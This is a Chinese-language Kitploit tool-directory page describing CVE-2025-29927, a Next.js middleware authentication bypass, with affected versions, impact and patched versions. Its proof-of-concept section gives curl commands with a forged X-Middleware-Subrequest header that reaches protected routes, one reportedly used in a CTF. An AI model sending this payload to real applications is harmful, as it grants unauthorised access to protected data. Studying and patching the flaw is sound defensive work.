Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-29927 — CVE-2025-29927的概念验证利用程序,利用x-middleware-subrequest头绕过Next.js中间件认证,从而跳过受保护路由的安全检查。 | Kitploit
工具/GitHubGitHub/toddkk02/cve-2025-29927
身份验证与授权漏洞分析IDS/IPS规避Web应用程序漏洞利用CTF渗透测试
GitHubtoddkk02/cve-2025-29927

CVE-2025-29927

CVE-2025-29927的概念验证利用程序,利用x-middleware-subrequest头绕过Next.js中间件认证,从而跳过受保护路由的安全检查。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-29927 — Next.js 中间件身份验证绕过

概述

想象一下,夜店门口站着个保安,如果你告诉他“我已经进来了”,他就不检查直接放你进去。这正是 CVE-2025-29927 所描述的情况。

Next.js 中的中间件在处理请求之前运行,因此是处理身份验证的理想位置。Next.js 使用一个内部的 x-middleware-subrequest 头部来防止递归请求并避免无限循环。此漏洞表明,可以完全绕过或跳过中间件的执行——包括在到达受保护路由之前关键的如身份验证等安全检查。


受影响版本

分支修复版本
15.x< 15.2.3
14.x< 14.2.25
13.x< 13.5.9

存在漏洞的应用

  • 托管 Next.js 并使用中间件的应用
  • 依赖中间件进行身份验证和安全检查,但未在应用堆栈中后续验证的应用

不受影响

  • 托管在 Vercel 上的应用
  • 托管在 Netlify 上的应用
  • 发布为 静态导出 的应用(中间件不会执行)

影响

成千上万甚至数百万的应用运行在未打补丁的 Next.js 版本上。如果没有缓解措施,此漏洞允许任何人在无需凭证的情况下未授权访问受保护的路由。


概念验证

root@kitploit:~
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/private-area

响应会返回受保护的页面,而不需要任何身份验证。

我在一个真实的 CTF 环境中利用了这个漏洞

root@kitploit:~
curl -s "http://<target>/<private-area>" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"

修复

将 Next.js 升级到已打补丁的版本:

  • 15.x → 15.2.3 或更高
  • 14.x → 14.2.25 或更高
  • 13.x → 13.5.9 或更高
下载工具